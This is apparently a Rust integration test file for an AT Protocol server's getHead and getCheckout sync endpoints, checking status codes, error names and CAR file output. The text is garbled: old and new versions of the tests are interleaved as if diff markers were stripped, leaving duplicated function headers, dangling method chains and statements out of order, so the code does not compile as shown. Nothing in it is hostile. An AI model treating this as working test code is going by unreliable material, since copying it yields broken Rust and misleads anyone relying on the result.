let body: Value = res.json().await.expect("Response was not valid JSON");
assert!(body["root"].is_string());
let root = body["root"].as_str().unwrap();
assert!(root.starts_with("bafy"), "Root CID should be a CID");
}
#[tokio::test]
async fn test_get_head_not_found() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", "did:plc:nonexistent12345")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "HeadNotFound");
assert!(
body["message"]
.as_str()
.unwrap()
.contains("Could not find root")
);
}
#[tokio::test]
async fn test_get_head_missing_param() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_head_empty_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", "")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "InvalidRequest");
}
#[tokio::test]
async fn test_get_head_whitespace_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", " ")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_head_changes_after_record_create() {
let client = client();
let (did, jwt) = setup_new_user("gethead-changes").await;
let res1 = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
let root1 = body["root"].as_str().unwrap().to_string();
assert!(root1.starts_with("bafy"), "Root CID should be a CID");
let latest_res = client
.get(format!("{}/xrpc/com.atproto.sync.getLatestCommit", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get initial head");
let body1: Value = res1.json().await.unwrap();
let head1 = body1["root"].as_str().unwrap().to_string();
.send().await.expect("Failed to get latest commit");
let latest_body: Value = latest_res.json().await.unwrap();
let latest_cid = latest_body["cid"].as_str().unwrap();
assert_eq!(root1, latest_cid, "getHead root should match getLatestCommit cid");
create_post(&client, &did, &jwt, "Post to change head").await;
let res2 = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get head after record");
.send().await.expect("Failed to get head after record");
let body2: Value = res2.json().await.unwrap();
let head2 = body2["root"].as_str().unwrap().to_string();
assert_ne!(head1, head2, "Head CID should change after record creation");
let root2 = body2["root"].as_str().unwrap().to_string();
assert_ne!(root1, root2, "Head CID should change after record creation");
let not_found_res = client
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", "did:plc:nonexistent12345")])
.send().await.expect("Failed to send request");
assert_eq!(not_found_res.status(), StatusCode::BAD_REQUEST);
let error_body: Value = not_found_res.json().await.unwrap();
assert_eq!(error_body["error"], "HeadNotFound");
let missing_res = client
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.send().await.expect("Failed to send request");
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
let empty_res = client
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", "")])
.send().await.expect("Failed to send request");
assert_eq!(empty_res.status(), StatusCode::BAD_REQUEST);
let whitespace_res = client
.get(format!("{}/xrpc/com.atproto.sync.getHead", base_url().await))
.query(&[("did", " ")])
.send().await.expect("Failed to send request");
assert_eq!(whitespace_res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_checkout_success() {
async fn test_get_checkout_comprehensive() {
let client = client();
let (did, jwt) = setup_new_user("getcheckout-success").await;
let (did, jwt) = setup_new_user("getcheckout").await;
let empty_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", did.as_str())])
.send().await.expect("Failed to send request");
assert_eq!(empty_res.status(), StatusCode::OK);
let empty_body = empty_res.bytes().await.expect("Failed to get body");
assert!(!empty_body.is_empty(), "Even empty repo should return CAR header");
create_post(&client, &did, &jwt, "Post for checkout test").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
.send().await.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
assert_eq!(
res.headers()
.get("content-type")
.and_then(|h| h.to_str().ok()),
Some("application/vnd.ipld.car")
);
assert_eq!(res.headers().get("content-type").and_then(|h| h.to_str().ok()), Some("application/vnd.ipld.car"));
let body = res.bytes().await.expect("Failed to get body");
assert!(!body.is_empty(), "CAR file should not be empty");
assert!(body.len() > 50, "CAR file should contain actual data");
}
#[tokio::test]
async fn test_get_checkout_not_found() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", "did:plc:nonexistent12345")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::NOT_FOUND);
let body: Value = res.json().await.expect("Response was not valid JSON");
assert_eq!(body["error"], "RepoNotFound");
}
#[tokio::test]
async fn test_get_checkout_missing_param() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_checkout_empty_did() {
let client = client();
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", "")])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
}
#[tokio::test]
async fn test_get_checkout_empty_repo() {
let client = client();
let (did, _jwt) = setup_new_user("getcheckout-empty").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(!body.is_empty(), "Even empty repo should return CAR header");
}
#[tokio::test]
async fn test_get_checkout_includes_multiple_records() {
let client = client();
let (did, jwt) = setup_new_user("getcheckout-multi").await;
for i in 0..5 {
assert!(body.len() >= 2, "CAR file should have at least header length");
for i in 0..4 {
tokio::time::sleep(std::time::Duration::from_millis(50)).await;
create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await;
}
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
let multi_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(body.len() > 500, "CAR file with 5 records should be larger");
}
#[tokio::test]
async fn test_get_head_matches_latest_commit() {
let client = client();
let (did, _jwt) = setup_new_user("gethead-matches-latest").await;
let head_res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getHead",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get head");
let head_body: Value = head_res.json().await.unwrap();
let head_root = head_body["root"].as_str().unwrap();
let latest_res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getLatestCommit",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to get latest commit");
let latest_body: Value = latest_res.json().await.unwrap();
let latest_cid = latest_body["cid"].as_str().unwrap();
assert_eq!(
head_root, latest_cid,
"getHead root should match getLatestCommit cid"
);
}
#[tokio::test]
async fn test_get_checkout_car_header_valid() {
let client = client();
let (did, _jwt) = setup_new_user("getcheckout-header").await;
let res = client
.get(format!(
"{}/xrpc/com.atproto.sync.getCheckout",
base_url().await
))
.query(&[("did", did.as_str())])
.send()
.await
.expect("Failed to send request");
assert_eq!(res.status(), StatusCode::OK);
let body = res.bytes().await.expect("Failed to get body");
assert!(
body.len() >= 2,
"CAR file should have at least header length"
);
.send().await.expect("Failed to send request");
assert_eq!(multi_res.status(), StatusCode::OK);
let multi_body = multi_res.bytes().await.expect("Failed to get body");
assert!(multi_body.len() > 500, "CAR file with 5 records should be larger");
let not_found_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", "did:plc:nonexistent12345")])
.send().await.expect("Failed to send request");
assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND);
let error_body: Value = not_found_res.json().await.unwrap();
assert_eq!(error_body["error"], "RepoNotFound");
let missing_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.send().await.expect("Failed to send request");
assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST);
let empty_did_res = client
.get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await))
.query(&[("did", "")])
.send().await.expect("Failed to send request");
assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST);
}